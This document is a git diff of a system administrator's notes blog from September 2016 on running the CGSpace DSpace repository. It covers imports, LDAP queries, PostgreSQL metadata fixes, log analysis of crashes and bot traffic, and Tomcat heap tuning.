$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
<pre tabindex="0"><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/3546 -s /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/SimpleArchiveFormat -m 3546.map
</code></pre><ul>
<li>Finally got DSpace 5.5 working with the Atmire modules after a few rounds of back and forth with Atmire devs</li>
</ul>
@ -360,7 +360,7 @@ $ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/b
<li>CGSpace had issues tonight, not entirely crashing, but becoming unresponsive</li>
<li>The dspace log had this:</li>
</ul>
<pre><code>2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>2016-08-26 20:48:05,040 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error - org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Related to /rest no doubt</li>
</ul>
@ -389,15 +389,15 @@ $ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/b
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -14,7 +14,7 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-09/" />
@ -32,9 +32,9 @@ Discuss how the migration of CGIAR&rsquo;s Active Directory to a flat structure
We had been using DC=ILRI to determine whether a user was ILRI or not
It looks like we might be able to use OUs now, instead of DCs:
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -64,12 +64,12 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -116,7 +116,7 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<time datetime="2016-09-01T15:53:00+03:00">Thu Sep 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -127,11 +127,11 @@ $ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=or
<li>We had been using <code>DC=ILRI</code> to determine whether a user was ILRI or not</li>
<li>It looks like we might be able to use OUs now, instead of DCs:</li>
</ul>
<pre><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &quot;dc=cgiarad,dc=org&quot; -D &quot;admigration1@cgiarad.org&quot; -W &quot;(sAMAccountName=admigration1)&quot;
<pre tabindex="0"><code>$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &#34;dc=cgiarad,dc=org&#34; -D &#34;admigration1@cgiarad.org&#34; -W &#34;(sAMAccountName=admigration1)&#34;
</code></pre><ul>
<li>User who has been migrated to the root vs user still in the hierarchical structure:</li>
</ul>
<pre><code>distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
<pre tabindex="0"><code>distinguishedName: CN=Last\, First (ILRI),OU=ILRI Kenya Employees,OU=ILRI Kenya,OU=ILRIHUB,DC=CGIARAD,DC=ORG
distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Ethiopia,DC=ILRI,DC=CGIARAD,DC=ORG
</code></pre><ul>
<li>Changing the DSpace LDAP config to use <code>OU=ILRIHUB</code> seems to work:</li>
@ -140,17 +140,17 @@ distinguishedName: CN=Last\, First (ILRI),OU=ILRI Ethiopia Employees,OU=ILRI Eth
<ul>
<li>Notes for local PostgreSQL database recreation from production snapshot:</li>
</ul>
<pre><code>$ dropdb dspacetest
<pre tabindex="0"><code>$ dropdb dspacetest
$ createdb -O dspacetest --encoding=UNICODE dspacetest
$ psql dspacetest -c 'alter user dspacetest createuser;'
$ psql dspacetest -c &#39;alter user dspacetest createuser;&#39;
$ pg_restore -O -U dspacetest -d dspacetest ~/Downloads/cgspace_2016-09-01.backup
$ psql dspacetest -c 'alter user dspacetest nocreateuser;'
$ psql dspacetest -c &#39;alter user dspacetest nocreateuser;&#39;
$ psql -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest -h localhost
$ vacuumdb dspacetest
</code></pre><ul>
<li>Some names that I thought I fixed in July seem not to be:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
text_value | authority | confidence
-----------------------+--------------------------------------+------------
Poole, Elizabeth Jane | b6efa27f-8829-4b92-80fe-bc63e03e3ccb | 600
@ -163,12 +163,12 @@ $ vacuumdb dspacetest
</code></pre><ul>
<li>At least a few of these actually have the correct ORCID, but I will unify the authority to be c3a22456-8d6a-41f9-bba0-de51ef564d45</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='c3a22456-8d6a-41f9-bba0-de51ef564d45', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Poole, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;c3a22456-8d6a-41f9-bba0-de51ef564d45&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Poole, %&#39;;
UPDATE 69
</code></pre><ul>
<li>And for Peter Ballantyne:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
text_value | authority | confidence
-------------------+--------------------------------------+------------
Ballantyne, Peter | 2dcbcc7b-47b0-4fd7-bef9-39d554494081 | 600
@ -180,26 +180,26 @@ UPDATE 69
</code></pre><ul>
<li>Again, a few have the correct ORCID, but there should only be one authority&hellip;</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='4f04ca06-9a76-4206-bd9c-917ca75d278e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Ballantyne, %';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;4f04ca06-9a76-4206-bd9c-917ca75d278e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Ballantyne, %&#39;;
UPDATE 58
</code></pre><ul>
<li>And for me:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, A%';
<pre tabindex="0"><code>dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, A%&#39;;
text_value | authority | confidence
------------+--------------------------------------+------------
Orth, Alan | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 4884def0-4d7e-4256-9dd4-018cd60a5871 | 600
Orth, A. | 1a1943a0-3f87-402f-9afe-e52fb46a513e | 600
(3 rows)
dspacetest=# update metadatavalue set authority='1a1943a0-3f87-402f-9afe-e52fb46a513e', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Orth, %';
dspacetest=# update metadatavalue set authority=&#39;1a1943a0-3f87-402f-9afe-e52fb46a513e&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Orth, %&#39;;
UPDATE 11
</code></pre><ul>
<li>And for CCAFS author Bruce Campbell that I had discussed with CCAFS earlier this week:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='0e414b4c-4671-4a23-b570-6077aca647d8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0e414b4c-4671-4a23-b570-6077aca647d8&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
UPDATE 166
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Campbell, B%';
dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Campbell, B%&#39;;
text_value | authority | confidence
------------------------+--------------------------------------+------------
Campbell, Bruce | 0e414b4c-4671-4a23-b570-6077aca647d8 | 600
@ -215,18 +215,18 @@ dspacetest=# select distinct text_value, authority, confidence from metadatavalu
<ul>
<li>After one week of logging TLS connections on CGSpace:</li>
</ul>
<pre><code># zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
<pre tabindex="0"><code># zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
217
# zcat -f -- /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | wc -l
1164376
# zgrep &quot;DES-CBC3&quot; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk '{print $6}' | sort | uniq
# zgrep &#34;DES-CBC3&#34; /var/log/nginx/cgspace.cgiar.org-access-ssl.log* | awk &#39;{print $6}&#39; | sort | uniq
TLSv1/DES-CBC3-SHA
TLSv1/EDH-RSA-DES-CBC3-SHA
</code></pre><ul>
<li>So this represents <code>0.02%</code> of 1.16M connections over a one-week period</li>
<li>Transforming some filenames in OpenRefine so they can have a useful description for SAFBuilder:</li>
</ul>
<pre><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>This gives you, for example: <code>Mainstreaming gender in agricultural R&amp;D.pdf__description:Brief</code></li>
</ul>
@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
<li>If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8</li>
<li>We should definitely clean filenames so they don&rsquo;t use characters that are tricky to process in CSV and shell scripts, like: <code>,</code>, <code>'</code>, and <code>&quot;</code></li>
</ul>
<pre><code>value.replace(&quot;'&quot;,&quot;&quot;).replace(&quot;,&quot;,&quot;&quot;).replace('&quot;','')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#34;&#34;).replace(&#34;,&#34;,&#34;&#34;).replace(&#39;&#34;&#39;,&#39;&#39;)
</code></pre><ul>
<li>I need to write a Python script to match that for renaming files in the file system</li>
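<li>The eventual script just needs to mirror that GREL transform on disk; a rough shell sketch of the same cleanup (untested; assumes the bitstreams are in the current directory):</li>
</ul>
<pre tabindex="0"><code>$ for f in *; do clean=$(echo "$f" | tr -d ",'\""); [ "$f" = "$clean" ] || mv -n -- "$f" "$clean"; done
</code></pre><ul>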
<li>When importing SAF bundles it seems you can specify the target collection on the command line using <code>-c 10568/4003</code> or in the <code>collections</code> file inside each item in the bundle</li>
@ -263,8 +263,8 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
</li>
<li>Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the <code>tomcat7</code> user, and deleting the bundle, for each collection&rsquo;s items:</li>
</ul>
<pre><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m&quot; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
<pre tabindex="0"><code>$ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
$ JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m&#34; /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
$ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
</code></pre><h2 id="2016-09-07">2016-09-07</h2>
<ul>
@ -274,7 +274,7 @@ $ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
<li>See: <a href="https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html">https://www.postgresql.org/docs/9.3/static/routine-vacuuming.html</a></li>
<li>CGSpace went down and the error seems to be the same as always (lately):</li>
</ul>
<pre><code>2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-07 11:39:23,162 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
...
</code></pre><ul>
@ -284,7 +284,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ul>
<li>CGSpace crashed twice today, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
</code></pre><ul>
<li>I enabled logging of requests to <code>/rest</code> again</li>
@ -293,33 +293,33 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<ul>
<li>CGSpace crashed again, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
<pre tabindex="0"><code>org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
at org.apache.commons.dbcp.PoolingDataSource.getConnection(PoolingDataSource.java:114)
</code></pre><ul>
<li>I restarted Tomcat and it was ok again</li>
<li>CGSpace crashed a few hours later, errors from <code>catalina.out</code>:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>We haven&rsquo;t seen that in quite a while&hellip;</li>
<li>Indeed, in a month of logs it only occurs 15 times:</li>
</ul>
<pre><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
15
</code></pre><ul>
<li>I also see a bunch of errors from dspace.log:</li>
</ul>
<pre><code>2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-14 12:23:07,981 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>Looking at REST requests, it seems there is one IP hitting us nonstop:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
820 50.87.54.15
12872 70.32.99.142
25744 70.32.83.92
# awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 3
7966 181.118.144.29
54706 70.32.99.142
109412 70.32.83.92
@ -328,19 +328,19 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>I think the stability issues are definitely from REST</li>
<li>Crashed AGAIN, errors from dspace.log:</li>
</ul>
<pre><code>2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-09-14 14:31:43,069 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
</code></pre><ul>
<li>And more heap space errors:</li>
</ul>
<pre><code># grep -rsI &quot;OutOfMemoryError&quot; /var/log/tomcat7/catalina.* | wc -l
<pre tabindex="0"><code># grep -rsI &#34;OutOfMemoryError&#34; /var/log/tomcat7/catalina.* | wc -l
19
</code></pre><ul>
<li>There are no more rest requests since the last crash, so maybe there are other things causing this.</li>
<li>Hmm, I noticed a shitload of IPs from 180.76.0.0/16 are connecting to both CGSpace and DSpace Test (58 unique IPs concurrently!)</li>
<li>They seem to be coming from Baidu, and so far during today alone account for 1/6 of every connection:</li>
</ul>
<pre><code># grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
<pre tabindex="0"><code># grep -c ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
29084
# grep -c ip_addr=180.76.15 /home/cgspace.cgiar.org/log/dspace.log.2016-09-14
5192
@ -349,26 +349,26 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>From the activity control panel I can see 58 unique IPs hitting the site <em>concurrently</em>, which has GOT to hurt our stability</li>
<li>A list of all 2000 unique IPs from CGSpace logs today:</li>
</ul>
<pre><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
<pre tabindex="0"><code># grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: &#39;{print $5}&#39; | sort -n | uniq -c | sort -h | tail -n 100
</code></pre><ul>
<li>Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc&hellip; do we have any real users?</li>
<li>Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=211 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
</code></pre><ul>
<li>Looking into the Catalina logs again around the time of the first crash, I see:</li>
</ul>
<pre><code>Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
<pre tabindex="0"><code>Wed Sep 14 09:47:27 UTC 2016 | Query:id: 78581 AND type:2
Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs.
Commit
Commit done
dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-193&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-193&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>And after that I see a bunch of &ldquo;pool error Timeout waiting for idle object&rdquo;</li>
<li>Later, near the time of the next crash I see:</li>
</ul>
<pre><code>dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
<pre tabindex="0"><code>dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Wed Sep 14 11:29:55 UTC 2016 | Query:id: 79078 AND type:2
Wed Sep 14 11:30:20 UTC 2016 | Updating : 6/6 docs.
Commit
@ -376,7 +376,7 @@ Commit done
Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas
SEVERE: Failed to generate the schema for the JAX-B elements
com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions
java.util.Map is an interface, and JAXB can't handle interfaces.
java.util.Map is an interface, and JAXB can&#39;t handle interfaces.
this problem is related to the following location:
at java.util.Map
at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender()
@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
</code></pre><ul>
<li>Then 20 minutes later another outOfMemoryError:</li>
</ul>
<pre><code>Exception in thread &quot;http-bio-127.0.0.1-8081-exec-25&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Exception in thread &#34;http-bio-127.0.0.1-8081-exec-25&#34; java.lang.OutOfMemoryError: Java heap space
at java.lang.StringCoding.decode(StringCoding.java:215)
</code></pre><ul>
<li>Perhaps these particular issues <em>are</em> memory issues, the munin graphs definitely show some weird purging/allocating behavior starting this week</li>
@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
<li>Oh great, the configuration on the actual server is different than in configuration management!</li>
<li>Seems we added a bunch of settings to the <code>/etc/default/tomcat7</code> in December, 2015 and never updated our ansible repository:</li>
</ul>
<pre><code>JAVA_OPTS=&quot;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&quot;
<pre tabindex="0"><code>JAVA_OPTS=&#34;-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>So I&rsquo;m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)</li>
<li>Increased JVM heap to 4096m on CGSpace (linode01)</li>
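<li>Presumably the cleaned-up <code>/etc/default/tomcat7</code> ends up looking roughly like this (a sketch; only the 4096m heap is from these notes, the remaining flags are assumed):</li>
</ul>
<pre tabindex="0"><code>JAVA_OPTS="-Djava.awt.headless=true -Xms4096m -Xmx4096m -Dfile.encoding=UTF-8"
</code></pre>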
@ -416,21 +416,21 @@ java.util.Map does not have a no-arg default constructor.
<ul>
<li>CGSpace crashed again, and there are TONS of heap space errors but the datestamps aren&rsquo;t on those lines so I&rsquo;m not sure if they were yesterday:</li>
</ul>
<pre><code>dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
<pre tabindex="0"><code>dn:CN=Orentlicher\, Natalie (CIAT),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org
Thu Sep 15 18:45:25 UTC 2016 | Query:id: 55785 AND type:2
Thu Sep 15 18:45:26 UTC 2016 | Updating : 100/218 docs.
Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs.
Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs.
Commit
Commit done
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-247&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-241&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-243&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-258&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-268&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-263&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-280&quot; java.lang.OutOfMemoryError: Java heap space
Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-247&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-241&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-243&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-258&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-268&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-263&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-280&#34; java.lang.OutOfMemoryError: Java heap space
Exception in thread &#34;Thread-54216&#34; org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb
-e14ef82ee224 to the index; possible analysis error.
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
@ -443,7 +443,7 @@ Exception in thread &quot;Thread-54216&quot; org.apache.solr.client.solrj.impl.H
<li>I bumped the heap space from 4096m to 5120m to see if this is <em>really</em> about heap space or not.</li>
<li>Looking into some of these errors that I&rsquo;ve seen this week but haven&rsquo;t noticed before:</li>
</ul>
<pre><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
<pre tabindex="0"><code># zcat -f -- /var/log/tomcat7/catalina.* | grep -c &#39;Failed to generate the schema for the JAX-B elements&#39;
113
</code></pre><ul>
